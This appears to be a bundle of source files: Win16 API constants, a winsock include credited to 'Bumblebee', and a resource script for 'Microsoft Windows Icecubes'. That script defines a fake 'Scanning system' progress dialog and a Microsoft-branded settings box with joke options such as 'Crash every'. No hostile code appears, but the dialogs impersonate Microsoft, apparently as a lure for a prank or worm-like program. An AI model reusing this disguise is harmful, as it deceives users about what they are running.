+COMPAREITEMSTRUCT ends + +; Owner draw control types +ODT_MENU = 1 +ODT_LISTBOX = 2 +ODT_COMBOBOX = 3 +ODT_BUTTON = 4 + +; Owner draw actions +ODA_DRAWENTIRE = 1 +ODA_SELECT = 2 +ODA_FOCUS = 4 + +; Owner draw state +ODS_SELECTED = 0001h +ODS_GRAYED = 0002h +ODS_DISABLED = 0004h +ODS_CHECKED = 0008h +ODS_FOCUS = 0010h + +; PeekMessage() Options +PM_NOREMOVE = 0000h +PM_REMOVE = 0001h +PM_NOYIELD = 0002h + +; SetWindowPos Flags +SWP_NOSIZE = 0001h +SWP_NOMOVE = 0002h +SWP_NOZORDER = 0004h +SWP_NOREDRAW = 0008h +SWP_NOACTIVATE = 0010h +SWP_DRAWFRAME = 0020h +SWP_SHOWWINDOW = 0040h +SWP_HIDEWINDOW = 0080h +SWP_NOCOPYBITS = 0100h +SWP_NOREPOSITION = 0200h + + +IFNDEF NOWINMESSAGES + +; Listbox messages +LB_ADDSTRING = (WM_USER+1) +LB_INSERTSTRING = (WM_USER+2) +LB_DELETESTRING = (WM_USER+3) +LB_RESETCONTENT = (WM_USER+5) +LB_SETSEL = (WM_USER+6) +LB_SETCURSEL = (WM_USER+7) +LB_GETSEL = (WM_USER+8) +LB_GETCURSEL = (WM_USER+9) +LB_GETTEXT = (WM_USER+10) +LB_GETTEXTLEN = (WM_USER+11) +LB_GETCOUNT = (WM_USER+12) +LB_SELECTSTRING = (WM_USER+13) +LB_DIR = (WM_USER+14) +LB_GETTOPINDEX = (WM_USER+15) +LB_FINDSTRING = (WM_USER+16) +LB_GETSELCOUNT = (WM_USER+17) +LB_GETSELITEMS = (WM_USER+18) +LB_SETTABSTOPS = (WM_USER+19) +LB_GETHORIZONTALEXTENT = (WM_USER+20) +LB_SETHORIZONTALEXTENT = (WM_USER+21) +LB_SETTOPINDEX = (WM_USER+24) +LB_GETITEMRECT = (WM_USER+25) +LB_GETITEMDATA = (WM_USER+26) +LB_SETITEMDATA = (WM_USER+27) +LB_SELITEMRANGE = (WM_USER+28) +LB_SETCARETINDEX = (WM_USER+31) +LB_GETCARETINDEX = (WM_USER+32) +IFNDEF NOWIN31 +LB_SETITEMHEIGHT = (WM_USER+33) +LB_GETITEMHEIGHT = (WM_USER+34) +LB_FINDSTRINGEXACT = (WM_USER+35) +ENDIF + +ENDIF +; NOWINMESSAGES + +; Listbox Styles +LBS_NOTIFY = 0001h +LBS_SORT = 0002h +LBS_NOREDRAW = 0004h +LBS_MULTIPLESEL = 0008h +LBS_OWNERDRAWFIXED = 0010h +LBS_OWNERDRAWVARIABLE = 0020h +LBS_HASSTRINGS = 0040h +LBS_USETABSTOPS = 0080h +LBS_NOINTEGRALHEIGHT = 0100h +LBS_MULTICOLUMN = 0200h +LBS_WANTKEYBOARDINPUT = 0400h +LBS_EXTENDEDSEL = 
0800h +LBS_STANDARD = LBS_NOTIFY + LBS_SORT + WS_VSCROLL + WS_BORDER +LBS_DISABLENOSCROLL = 1000h + +; Listbox Notification Codes +LBN_ERRSPACE = (-2) +LBN_SELCHANGE = 1 +LBN_DBLCLK = 2 +LBN_SELCANCEL = 3 +LBN_SETFOCUS = 4 +LBN_KILLFOCUS = 5 + +IFNDEF NOWINMESSAGES + +; Edit Control Messages +EM_GETSEL = (WM_USER+0) +EM_SETSEL = (WM_USER+1) +EM_GETRECT = (WM_USER+2) +EM_SETRECT = (WM_USER+3) +EM_SETRECTNP = (WM_USER+4) +EM_SCROLL = (WM_USER+5) +EM_LINESCROLL = (WM_USER+6) +EM_GETMODIFY = (WM_USER+8) +EM_SETMODIFY = (WM_USER+9) +EM_GETLINECOUNT = (WM_USER+10) +EM_LINEINDEX = (WM_USER+11) +EM_SETHANDLE = (WM_USER+12) +EM_GETHANDLE = (WM_USER+13) +EM_LINELENGTH = (WM_USER+17) +EM_REPLACESEL = (WM_USER+18) +EM_SETFONT = (WM_USER+19) +EM_GETLINE = (WM_USER+20) +EM_LIMITTEXT = (WM_USER+21) +EM_CANUNDO = (WM_USER+22) +EM_UNDO = (WM_USER+23) +EM_FMTLINES = (WM_USER+24) +EM_LINEFROMCHAR = (WM_USER+25) +EM_SETWORDBREAK = (WM_USER+26) +EM_SETTABSTOPS = (WM_USER+27) +EM_SETPASSWORDCHAR = (WM_USER+28) +EM_EMPTYUNDOBUFFER = (WM_USER+29) +IFNDEF NOWIN31 +EM_GETFIRSTVISIBLELINE = (WM_USER+30) +EM_SETREADONLY = (WM_USER+31) +EM_SETWORDBREAKPROC = (WM_USER+32) +EM_GETWORDBREAKPROC = (WM_USER+33) +EM_GETPASSWORDCHAR = (WM_USER+34) +ENDIF + +ENDIF +; NOWINMESSAGES + + +; Edit Control Styles (low word) +ES_LEFT = 0000h +ES_CENTER = 0001h +ES_RIGHT = 0002h +ES_MULTILINE = 0004h +ES_UPPERCASE = 0008h +ES_LOWERCASE = 0010h +ES_PASSWORD = 0020h +ES_AUTOVSCROLL = 0040h +ES_AUTOHSCROLL = 0080h +ES_NOHIDESEL = 0100h +ES_OEMCONVERT = 0400h +IFNDEF NOWIN31 +ES_READONLY = 0800h +ES_WANTRETURN = 1000h +ENDIF + + +; Edit Control Notification Codes +EN_SETFOCUS = 0100h +EN_KILLFOCUS = 0200h +EN_CHANGE = 0300h +EN_UPDATE = 0400h +EN_ERRSPACE = 0500h +EN_MAXTEXT = 0501h +EN_HSCROLL = 0601h +EN_VSCROLL = 0602h + +IFNDEF NOWINMESSAGES + +; Button Control Messages +BM_GETCHECK = (WM_USER+0) +BM_SETCHECK = (WM_USER+1) +BM_GETSTATE = (WM_USER+2) +BM_SETSTATE = (WM_USER+3) +BM_SETSTYLE = (WM_USER+4) + 
+ENDIF +; NOWINMESSAGES + +; Button Control Styles (low word) +BS_PUSHBUTTON = 00h +BS_DEFPUSHBUTTON = 01h +BS_CHECKBOX = 02h +BS_AUTOCHECKBOX = 03h +BS_RADIOBUTTON = 04h +BS_3STATE = 05h +BS_AUTO3STATE = 06h +BS_GROUPBOX = 07h +BS_USERBUTTON = 08h +BS_AUTORADIOBUTTON = 09h +BS_OWNERDRAW = 0Bh +BS_LEFTTEXT = 20h + +; User Button Notification Codes +BN_CLICKED = 0 +BN_PAINT = 1 +BN_HILITE = 2 +BN_UNHILITE = 3 +BN_DISABLE = 4 +BN_DOUBLECLICKED = 5 + +; Dialog Styles (low words) +DS_ABSALIGN = 01h +DS_SYSMODAL = 02h +DS_LOCALEDIT = 20h ;/* Edit items get Local storage. */ +DS_SETFONT = 40h ;/* User specified font for Dlg controls */ +DS_MODALFRAME = 80h ;/* Can be combined with WS_CAPTION */ +DS_NOIDLEMSG = 100h ;/* WM_ENTERIDLE message will not be sent */ + +IFNDEF NOWINMESSAGES + +; Dialog box messages +DM_GETDEFID = (WM_USER+0) +DM_SETDEFID = (WM_USER+1) + +ENDIF ;NOWINMESSAGES + +; Dialog Codes +DLGC_WANTARROWS = 0001h ; /* Control wants arrow keys */ +DLGC_WANTTAB = 0002h ; /* Control wants tab keys */ +DLGC_WANTALLKEYS = 0004h ; /* Control wants all keys */ +DLGC_WANTMESSAGE = 0004h ; /* Pass message to control */ +DLGC_HASSETSEL = 0008h ; /* Understands EM_SETSEL message */ +DLGC_DEFPUSHBUTTON = 0010h ; /* Default pushbutton */ +DLGC_UNDEFPUSHBUTTON= 0020h ; /* Non-default pushbutton */ +DLGC_RADIOBUTTON = 0040h ; /* Radio button */ +DLGC_WANTCHARS = 0080h ; /* Want WM_CHAR messages */ +DLGC_STATIC = 0100h ; /* Static item: don't include */ +DLGC_BUTTON = 2000h ; /* Button item: can be checked */ + +; Combo Box return Values +CB_OKAY = 0 +CB_ERR = (-1) +CB_ERRSPACE = (-2) + +; Combo Box Notification Codes +CBN_ERRSPACE = (-1) +CBN_SELCHANGE = 1 +CBN_DBLCLK = 2 +CBN_SETFOCUS = 3 +CBN_KILLFOCUS = 4 +CBN_EDITCHANGE = 5 +CBN_EDITUPDATE = 6 +CBN_DROPDOWN = 7 + +; Combo Box styles (low words) +CBS_SIMPLE = 0001h +CBS_DROPDOWN = 0002h +CBS_DROPDOWNLIST = 0003h +CBS_OWNERDRAWFIXED = 0010h +CBS_OWNERDRAWVARIABLE= 0020h +CBS_AUTOHSCROLL = 0040h +CBS_OEMCONVERT = 0080h 
+CBS_SORT = 0100h +CBS_HASSTRINGS = 0200h +CBS_NOINTEGRALHEIGHT = 0400h + +IFNDEF NOWINMESSAGES + +; Combo Box messages +CB_GETEDITSEL = (WM_USER+0) +CB_LIMITTEXT = (WM_USER+1) +CB_SETEDITSEL = (WM_USER+2) +CB_ADDSTRING = (WM_USER+3) +CB_DELETESTRING = (WM_USER+4) +CB_DIR = (WM_USER+5) +CB_GETCOUNT = (WM_USER+6) +CB_GETCURSEL = (WM_USER+7) +CB_GETLBTEXT = (WM_USER+8) +CB_GETLBTEXTLEN = (WM_USER+9) +CB_INSERTSTRING = (WM_USER+10) +CB_RESETCONTENT = (WM_USER+11) +CB_FINDSTRING = (WM_USER+12) +CB_SELECTSTRING = (WM_USER+13) +CB_SETCURSEL = (WM_USER+14) +CB_SHOWDROPDOWN = (WM_USER+15) +CB_GETITEMDATA = (WM_USER+16) +CB_SETITEMDATA = (WM_USER+17) +IFNDEF NOWIN31 +CB_GETDROPPEDCONTROLRECT = (WM_USER+18) +CB_SETITEMHEIGHT = (WM_USER+19) +CB_GETITEMHEIGHT = (WM_USER+20) +CB_SETEXTENDEDUI = (WM_USER+21) +CB_GETEXTENDEDUI = (WM_USER+22) +CB_GETDROPPEDSTATE = (WM_USER+23) +CB_FINDSTRINGEXACT = (WM_USER+24) +ENDIF + +ENDIF ; NOWINMESSAGES + +; Static Control styles (low word) +SS_LEFT = 00h +SS_CENTER = 01h +SS_RIGHT = 02h +SS_ICON = 03h +SS_BLACKRECT = 04h +SS_GRAYRECT = 05h +SS_WHITERECT = 06h +SS_BLACKFRAME = 07h +SS_GRAYFRAME = 08h +SS_WHITEFRAME = 09h +SS_SIMPLE = 0Bh +SS_LEFTNOWORDWRAP = 0Ch +SS_NOPREFIX = 80h ; Don't do "&" character translation + +IFNDEF NOWIN31 +IFNDEF NOWINMESSAGES + +;Static Control Messages +STM_SETICON = (WM_USER+0) +STM_GETICON = (WM_USER+1) +ENDIF +ENDIF + +; Scroll Bar Styles (low word) +SBS_HORZ = 0000h +SBS_VERT = 0001h +SBS_TOPALIGN = 0002h +SBS_LEFTALIGN = 0002h +SBS_BOTTOMALIGN = 0004h +SBS_RIGHTALIGN = 0004h +SBS_SIZEBOXTOPLEFTALIGN = 0002h +SBS_SIZEBOXBOTTOMRIGHTALIGN = 0004h +SBS_SIZEBOX = 0008h + +IFNDEF NOSYSMETRICS + +; GetSystemMetrics() codes +SM_CXSCREEN = 0 +SM_CYSCREEN = 1 +SM_CXVSCROLL = 2 +SM_CYHSCROLL = 3 +SM_CYCAPTION = 4 +SM_CXBORDER = 5 +SM_CYBORDER = 6 +SM_CXDLGFRAME = 7 +SM_CYDLGFRAME = 8 +SM_CYVTHUMB = 9 +SM_CXHTHUMB = 10 +SM_CXICON = 11 +SM_CYICON = 12 +SM_CXCURSOR = 13 +SM_CYCURSOR = 14 +SM_CYMENU = 15 
+SM_CXFULLSCREEN = 16
+SM_CYFULLSCREEN = 17
+SM_CYKANJIWINDOW = 18
+SM_MOUSEPRESENT = 19
+SM_CYVSCROLL = 20
+SM_CXHSCROLL = 21
+SM_DEBUG = 22
+SM_SWAPBUTTON = 23
+SM_RESERVED1 = 24
+SM_RESERVED2 = 25
+SM_RESERVED3 = 26
+SM_RESERVED4 = 27
+SM_CXMIN = 28
+SM_CYMIN = 29
+SM_CXSIZE = 30
+SM_CYSIZE = 31
+SM_CXFRAME = 32
+SM_CYFRAME = 33
+SM_CXMINTRACK = 34
+SM_CYMINTRACK = 35
+IFNDEF NOWIN31
+SM_CXDOUBLECLK = 36
+SM_CYDOUBLECLK = 37
+SM_CXICONSPACING = 38
+SM_CYICONSPACING = 39
+SM_MENUDROPALIGNMENT = 40
+SM_PENWINDOWS = 41
+SM_DBCSENABLED = 42
+ENDIF
+SM_CMETRICSMAX = 43
+
+ENDIF ;NOSYSMETRICS
+
+IFNDEF NOCOLOR
+
+COLOR_SCROLLBAR = 0
+COLOR_BACKGROUND = 1
+COLOR_ACTIVECAPTION = 2
+COLOR_INACTIVECAPTION = 3
+COLOR_MENU = 4
+COLOR_WINDOW = 5
+COLOR_WINDOWFRAME = 6
+COLOR_MENUTEXT = 7
+COLOR_WINDOWTEXT = 8
+COLOR_CAPTIONTEXT = 9
+COLOR_ACTIVEBORDER = 10
+COLOR_INACTIVEBORDER = 11
+COLOR_APPWORKSPACE = 12
+COLOR_HIGHLIGHT = 13
+COLOR_HIGHLIGHTTEXT = 14
+COLOR_BTNFACE = 15
+COLOR_BTNSHADOW = 16
+COLOR_GRAYTEXT = 17
+COLOR_BTNTEXT = 18
+IFNDEF NOWIN31
+COLOR_INACTIVECAPTIONTEXT = 19
+COLOR_BTNHILIGHT = 20
+ENDIF
+ENDIF ;NOCOLOR
+
+; Commands to pass WinHelp()
+HELP_CONTEXT =0001h ;/* Display topic in ulTopic */
+HELP_QUIT =0002h ;/* Terminate help */
+HELP_INDEX =0003h ;/* Display index */
+HELP_HELPONHELP =0004h ;/* Display help on using help */
+HELP_SETINDEX =0005h ;/* Set the current Index for multi index help */
+HELP_KEY =0101h ;/* Display topic for keyword in offabData */
+
+IFNDEF NOCOMM
+
+NOPARITY = 0
+ODDPARITY = 1
+EVENPARITY = 2
+MARKPARITY = 3
+SPACEPARITY = 4
+
+ONESTOPBIT = 0
+ONE5STOPBITS = 1
+TWOSTOPBITS = 2
+
+IGNORE = 0 ; /* Ignore signal */
+INFINITE = 0FFFFh ; /* Infinite timeout */
+
+; Error Flags
+CE_RXOVER = 0001h ; /* Receive Queue overflow */
+CE_OVERRUN = 0002h ; /* Receive Overrun Error */
+CE_RXPARITY = 0004h ; /* Receive Parity Error */
+CE_FRAME = 0008h ; /* Receive Framing error */
+CE_BREAK = 0010h ; /* Break Detected */
+CE_CTSTO = 0020h ; /* CTS Timeout */
+CE_DSRTO = 0040h ; /* DSR Timeout */
+CE_RLSDTO = 0080h ; /* RLSD Timeout */
+CE_TXFULL = 0100h ; /* TX Queue is full */
+CE_PTO = 0200h ; /* LPTx Timeout */
+CE_IOE = 0400h ; /* LPTx I/O Error */
+CE_DNS = 0800h ; /* LPTx Device not selected */
+CE_OOP = 1000h ; /* LPTx Out-Of-Paper */
+CE_MODE = 8000h ; /* Requested mode unsupported */
+
+IE_BADID = (-1) ; /* Invalid or unsupported id */
+IE_OPEN = (-2) ; /* Device Already Open */
+IE_NOPEN = (-3) ; /* Device Not Open */
+IE_MEMORY = (-4) ; /* Unable to allocate queues */
+IE_DEFAULT = (-5) ; /* Error in default parameters */
+IE_HARDWARE = (-10) ; /* Hardware Not Present */
+IE_BYTESIZE = (-11) ; /* Illegal Byte Size */
+IE_BAUDRATE = (-12) ; /* Unsupported BaudRate */
+
+; Events
+EV_RXCHAR = 0001h ; /* Any Character received */
+EV_RXFLAG = 0002h ; /* Received certain character */
+EV_TXEMPTY = 0004h ; /* Transmitt Queue Empty */
+EV_CTS = 0008h ; /* CTS changed state */
+EV_DSR = 0010h ; /* DSR changed state */
+EV_RLSD = 0020h ; /* RLSD changed state */
+EV_BREAK = 0040h ; /* BREAK received */
+EV_ERR = 0080h ; /* Line status error occurred */
+EV_RING = 0100h ; /* Ring signal detected */
+EV_PERR = 0200h ; /* Printer error occured */
+EV_CTSS = 0400h ; /* CTS state */
+EV_DSRS = 0800h ; /* DSR state */
+EV_RLSDS = 1000h ; /* RLSD state */
+EV_RingTe = 2000h ; /* Ring Trailing Edge Indicator */
+
+
+; Escape Functions
+SETXOFF = 1 ; /* Simulate XOFF received */
+SETXON = 2 ; /* Simulate XON received */
+SETRTS = 3 ; /* Set RTS high */
+CLRRTS = 4 ; /* Set RTS low */
+SETDTR = 5 ; /* Set DTR high */
+CLRDTR = 6 ; /* Set DTR low */
+RESETDEV = 7 ; /* Reset device if possible */
+
+LPTx = 80h ; /* Set if ID is for LPT device */
+
+IFNDEF NOWIN31
+; new escape functions
+GETMAXLPT equ 8 ; Max supported LPT id
+GETMAXCOM equ 9 ; Max supported COM id
+GETBASEIRQ equ 10 ; Get port base & irq for a port
+
+; Comm Baud Rate indices
+CBR_110 equ 0FF10h
+CBR_300 equ 0FF11h
+CBR_600 equ 0FF12h
+CBR_1200 equ 0FF13h
+CBR_2400 equ 0FF14h
+CBR_4800 equ 0FF15h
+CBR_9600 equ 0FF16h
+CBR_14400 equ 0FF17h
+CBR_19200 equ 0FF18h
+; 0FF19h (reserved)
+; 0FF1Ah (reserved)
+CBR_38400 equ 0FF1Bh
+; 0FF1Ch (reserved)
+; 0FF1Dh (reserved)
+; 0FF1Eh (reserved)
+CBR_56000 equ 0FF1Fh
+; 0FF20h (reserved)
+; 0FF21h (reserved)
+; 0FF22h (reserved)
+CBR_128000 equ 0FF23h
+; 0FF24h (reserved)
+; 0FF25h (reserved)
+; 0FF26h (reserved)
+CBR_256000 equ 0FF27h
+
+; notifications passed in low word of lParam on WM_COMMNOTIFY messages
+CN_RECEIVE equ 1 ; bytes are available in the input queue
+CN_TRANSMIT equ 2 ; fewer than wOutTrigger bytes still
+ ; remain in the output queue waiting
+ ; to be transmitted.
+CN_EVENT equ 4 ; an enabled event has occurred
+
+ENDIF
+
+
+DCB struc
+ DCB_Id db ? ; /* Internal Device ID */
+ DCB_BaudRate dw ? ; /* Baudrate at which runing */
+ DCB_ByteSize db ? ; /* Number of bits/byte, 4-8 */
+ DCB_Parity db ? ; /* 0-4=None,Odd,Even,Mark,Space */
+ DCB_StopBits db ? ; /* 0,1,2 = 1, 1.5, 2 */
+ DCB_RlsTimeout dw ? ; /* Timeout for RLSD to be set */
+ DCB_CtsTimeout dw ? ; /* Timeout for CTS to be set */
+ DCB_DsrTimeout dw ? ; /* Timeout for DSR to be set */
+
+ DCB_BitMask1 db ?
+
+ ; BYTE fBinary: 1; /* Binary Mode (skip EOF check */
+ ; BYTE fRtsDisable:1; /* Don't assert RTS at init time */
+ ; BYTE fParity: 1; /* Enable parity checking */
+ ; BYTE fOutxCtsFlow:1; /* CTS handshaking on output */
+ ; BYTE fOutxDsrFlow:1; /* DSR handshaking on output */
+ ; BYTE fDummy: 2; /* Reserved */
+ ; BYTE fDtrDisable:1; /* Don't assert DTR at init time */
+
+ DCB_BitMask2 db ?
+
+ ; BYTE fOutX: 1; /* Enable output X-ON/X-OFF */
+ ; BYTE fInX: 1; /* Enable input X-ON/X-OFF */
+ ; BYTE fPeChar: 1; /* Enable Parity Err Replacement */
+ ; BYTE fNull: 1; /* Enable Null stripping */
+ ; BYTE fChEvt: 1; /* Enable Rx character event. */
+ ; BYTE fDtrflow: 1; /* DTR handshake on input */
+ ; BYTE fRtsflow: 1; /* RTS handshake on input */
+ ; BYTE fDummy2: 1;
+
+ DCB_XonChar db ? ; /* Tx and Rx X-ON character */
+ DCB_XoffChar db ? ; /* Tx and Rx X-OFF character */
+ DCB_XonLim dw ? ; /* Transmit X-ON threshold */
+ DCB_XoffLim dw ? ; /* Transmit X-OFF threshold */
+ DCB_PeChar db ? ; /* Parity error replacement char */
+ DCB_EofChar db ? ; /* End of Input character */
+ DCB_EvtChar db ? ; /* Recieved Event character */
+ DCB_TxDelay dw ? ; /* Amount of time between chars */
+DCB ends
+
+COMSTAT struc
+ COMS_BitMask1 db ?
+
+; BYTE fCtsHold: 1; /* Transmit is on CTS hold */
+; BYTE fDsrHold: 1; /* Transmit is on DSR hold */
+; BYTE fRlsdHold: 1; /* Transmit is on RLSD hold */
+; BYTE fXoffHold: 1; /* Received handshake */
+; BYTE fXoffSent: 1; /* Issued handshake */
+; BYTE fEof: 1; /* End of file character found */
+; BYTE fTxim: 1; /* Character being transmitted */
+
+
+ COMS_cbInQue dw ? ; /* count of characters in Rx Queue */
+ COMS_cbOutQue dw ? ; /* count of characters in Tx Queue */
+COMSTAT ends
+
+ENDIF ;NOCOM
+
+;
+; Installable Driver Support
+;
+; Driver Messages
+DRV_LOAD = 0001h
+DRV_ENABLE = 0002h
+DRV_OPEN = 0003h
+DRV_CLOSE = 0004h
+DRV_DISABLE = 0005h
+DRV_FREE = 0006h
+DRV_CONFIGURE = 0007h
+DRV_QUERYCONFIGURE = 0008h
+DRV_INSTALL = 0009h
+DRV_REMOVE = 000Ah
+DRV_EXITSESSION = 000Bh
+DRV_POWER = 000Fh
+DRV_RESERVED = 0800h
+DRV_USER = 4000h
+
+;LPARAM of DRV_CONFIGURE message and return values
+DRVCONFIGINFO struc
+ DRVCNF_dwDCISize dw ?
+ DRVCNF_lpszDCISectionName dd ?
+ DRVCNF_lpszDCIAliasName dd ?
+DRVCONFIGINFO ends
+
+DRVCNF_CANCEL = 0000h
+DRVCNF_OK = 0001h
+DRVCNF_RESTART = 0002h
+
+
+IFNDEF NOKERNEL
+;
+; Common Kernel errors
+;
+ERR_GALLOC = 01030h ; GlobalAlloc Failed
+ERR_GREALLOC = 01031h ; GlobalReAlloc Failed
+ERR_GLOCK = 01032h ; GlobalLock Failed
+ERR_LALLOC = 01033h ; LocalAlloc Failed
+ERR_LREALLOC = 01034h ; LocalReAlloc Failed
+ERR_LLOCK = 01035h ; LocalLock Failed
+ERR_ALLOCRES = 01036h ; AllocResource Failed
+ERR_LOCKRES = 01037h ; LockResource Failed
+ERR_LOADMODULE = 01038h ; LoadModule failed
+
+;
+; Common User Errors
+;
+ERR_CREATEDLG = 01045h ; /* Create Dlg failure due to LoadMenu failure */
+ERR_CREATEDLG2 = 01046h ; /* Create Dlg failure due to CreateWindow Failure */
+ERR_REGISTERCLASS = 01047h ; /* RegisterClass failure due to Class already registered */
+ERR_DCBUSY = 01048h ; /* DC Cache is full */
+ERR_CREATEWND = 01049h ; /* Create Wnd failed due to class not found */
+ERR_STRUCEXTRA = 01050h ; /* Unallocated Extra space is used */
+ERR_LOADSTR = 01051h ; /* LoadString() failed */
+ERR_LOADMENU = 01052h ; /* LoadMenu Failed */
+ERR_NESTEDBEGINPAINT = 01053h ; /* Nested BeginPaint() calls */
+ERR_BADINDEX = 01054h ; /* Bad index to Get/Set Class/Window Word/Long */
+ERR_CREATEMENU = 01055h ; /* Error creating menu */
+
+;
+; Common GDI Errors
+;
+ERR_CREATEDC = 01070h ; /* CreateDC/CreateIC etc., failure */
+ERR_CREATEMETA = 01071h ; /* CreateMetafile failure */
+ERR_DELOBJSELECTED = 01072h ; /* Bitmap being deleted is selected into DC */
+ERR_SELBITMAP = 01073h ; /* Bitmap being selected is already selected elsewhere */
+
+ENDIF ;NOKERNEL
+[WINDOWS.INC]
+[WSOCKS.INC]
+;
+; WSocks.inc: include file for windows sockets .
+; Designed for TASM5 and Win32.
+;
+; (C) 1999 Bumblebee.
+;
+; This file contains basic structures and stuff to work
+; with windows sockets.
+;
+
+; Descriptions of the API:
+; arguments in order of PUSH ;)
+
+; only for debug
+extrn WSAGetLastError:PROC
+
+; starts the use of winsock dll
+; addr WSADATA, version requested
+; returns: 0 ok
+extrn WSAStartup:PROC
+
+; terminates the use of winsock dll
+; returns: SOCK_ERR on error
+extrn WSACleanup:PROC
+
+; opens a new socket
+; protocol (PCL_NONE), type (SOCK_??), addr format (AF_??)
+; returns: socket id or SOCKET_ERR (socket is dw)
+extrn socket:PROC
+
+; closes a socket
+; socket descriptor
+;
+extrn closesocket:PROC
+
+; sends data (this socks are a shit... Unix uses simple write)
+; flags (1 OOB data or 0 normal ) , length, addr of buffer, socket
+; returns: caracters sent or SOCKET_ERR on error
+extrn send:PROC
+
+; reveives data (this socks are a shit... Unix uses simple read)
+; flags (use 0), length, addr of buffer, socket
+; returns: caracters sent or SOCKET_ERR on error
+extrn recv:PROC
+
+; connects to a server
+; sizeof struct SOCKADDR, struct SOCKADDR, socket
+; returns: SOCKET_ERR on error
+extrn connect:PROC
+
+; gets the name of the current host
+; length of the buffer for name, addr of buffer for name
+; return: SOCKET_ERR on error
+extrn gethostname:PROC
+
+; gets strcut hostent
+; addr of name
+; returns: ponter to the struct or 0 on error
+extrn gethostbyname:PROC
+
+; converts a zstring like "xxx.xxx.xx...." to netw byte order
+; zstring ptr to change to dotted addr format
+; returns: in_addr (dd)
+extrn inet_addr:PROC
+
+; dw to convert into netw byte order (usually the port)
+; returns: the value in network byte order (dw)
+extrn htons:PROC
+
+; Structs :o
+
+; sockaddr struct for connection
+; modified (for better use)
+; if you want the original look for it into a winsock.h
+SOCKADDR struct
+sin_family dw 0 ; ex. AF_INET
+sin_port dw 0 ; use htons for this
+sin_addr dd 0 ; here goes server node (from inet_addr)
+sin_zero db 8 dup(0)
+SOCKADDR ends
+
+; for WSAStartup diagnose
+WSADATA struct
+mVersion dw 0
+mHighVersion dw 0
+szDescription db 257 dup(0)
+szSystemStatus db 129 dup(0)
+iMaxSockets dw 0
+iMaxUpdDg dw 0
+lpVendorInfo dd 0
+WSADATA ends
+
+; Some nice equs
+
+; what version of winsock do you need? (usually 1.1)
+VERSION1_0 equ 0100h
+VERSION1_1 equ 0101h
+VERSION2_0 equ 0200h
+
+AF_UNIX equ 1 ; local host
+AF_INET equ 2 ; internet (most used)
+AF_IMPLINK equ 3 ; arpanet
+AF_NETBIOS equ 17 ; NetBios style addresses
+
+; types of sockets
+SOCK_STREAM equ 1 ; stream (connection oriented; telnet like)
+SOCK_DGRAM equ 2 ; datagram (packets, packets, packets)
+
+; protocol
+PCL_NONE equ 0 ; none (define the protocol not needed)
+
+SOCKET_ERR equ -1 ; standard winsock error
+
+HOSTENT_IP equ 10h ; where is the IP into the hostent struct
+[WSOCKS.INC]
+[ICECUBES.RC]
+#define IDM_ABOUTBOX 0x0010
+#define IDD_ABOUTBOX 100
+#define IDS_ABOUTBOX 101
+#define IDD_VKS_DIALOG_0 102
+#define IDD_VKS_DIALOG_1 103
+#define IDR_MAINFRAME 128
+#define IDC_CHECK1 1000
+#define IDC_CHECK2 1001
+#define IDC_EDIT3 1003
+#define IDC_SPIN1 1018
+#define IDC_COMBO1 1004
+#define IDC_EDIT1 1005
+#define IDC_CHECK3 1006
+#define IDC_CHECK4 1007
+#define IDC_EDIT2 1008
+#define IDC_BUTTON1 1009
+#define IDC_BUTTON2 1014
+#define IDC_CHECK5 1010
+#define IDC_RADIO1 1012
+#define IDC_RADIO2 1013
+#define IDC_STATIC 1015
+#define IDC_STATIC2 1016
+
+
+11 ICON "icecubes.ico"
+
+IDD_VKS_DIALOG_0 DIALOG 0, 0, 255, 20
+STYLE DS_MODALFRAME | DS_3DLOOK | DS_CENTER | WS_POPUP | WS_VISIBLE |
+ WS_CAPTION | WS_SYSMENU
+CAPTION "Scanning system for Microsoft Windows Icecubes..."
+FONT 8, "Verdana"
+BEGIN
+ CONTROL "",105,"msctls_progress32",WS_CLIPSIBLINGS,5,5,244,11
+END
+
+
+IDD_VKS_DIALOG_1 DIALOG 0, 0, 233, 252
+STYLE DS_MODALFRAME | DS_3DLOOK | WS_POPUP | WS_VISIBLE | WS_CAPTION | WS_SYSMENU
+EXSTYLE WS_EX_APPWINDOW
+CAPTION "Microsoft Windows Icecubes"
+FONT 8, "MS Sans Serif"
+BEGIN
+
+ LTEXT "Manufacturer's default settings (not to be edited)",
+ IDC_STATIC,13,8,200,8
+
+ GROUPBOX "Endurance options",IDC_STATIC,7,23,218,53
+ CONTROL "Crash every",IDC_CHECK1,"Button",BS_AUTOCHECKBOX |
+ WS_TABSTOP,15,36,50,10
+ CONTROL "Crash after",IDC_CHECK2,"Button",BS_AUTOCHECKBOX |
+ WS_TABSTOP,15,54,50,10
+
+ EDITTEXT IDC_EDIT3,75,35,34,12,ES_AUTOHSCROLL
+ CONTROL "Spin1",IDC_SPIN1,"msctls_updown32",UDS_ARROWKEYS,108,35,
+ 8,12
+
+ COMBOBOX IDC_COMBO1,130,35,72,85,CBS_DROPDOWNLIST | CBS_SORT |
+ WS_VSCROLL | WS_TABSTOP
+
+ EDITTEXT IDC_EDIT1,75,53,43,13,ES_AUTOHSCROLL
+ LTEXT "bytes of un-saved changes",IDC_STATIC,130,55,94,13
+
+
+ GROUPBOX "Save options",IDC_STATIC,7,81,218,69
+ CONTROL "Create incredibly large files",IDC_CHECK3,"Button",
+ BS_AUTOCHECKBOX | WS_TABSTOP,15,94,163,10
+ CONTROL "Allow me to carry on typing during AutoRecovery saves",
+ IDC_CHECK4,"Button",BS_AUTOCHECKBOX | WS_TABSTOP,15,112,
+ 195,10
+ LTEXT "Fail AutoRecovery at",IDC_STATIC,25,130,120,13
+ LTEXT "percent",IDC_STATIC2,125,130,50,13
+
+ EDITTEXT IDC_EDIT2,100,128,18,12,ES_AUTOHSCROLL
+
+ GROUPBOX "Other options",IDC_STATIC,7,157,218,70
+ CONTROL "Decrease boot speed by 70%",IDC_CHECK5,"Button",
+ BS_AUTOCHECKBOX | WS_TABSTOP,15,170,190,14
+ CONTROL "constantly",IDC_RADIO1,"Button",BS_AUTORADIOBUTTON,35,
+ 198,48,10
+ CONTROL "when I least expect it",IDC_RADIO2,"Button",
+ BS_AUTORADIOBUTTON,35,210,83,10
+ LTEXT "Annoy me with that sodding paperclip",IDC_STATIC,25,186,
+ 136,10
+
+ PUSHBUTTON "Cancel",IDC_BUTTON1,122,233,50,12
+ DEFPUSHBUTTON "Ok",IDC_BUTTON2,64,233,50,12
+
+END
+
+
+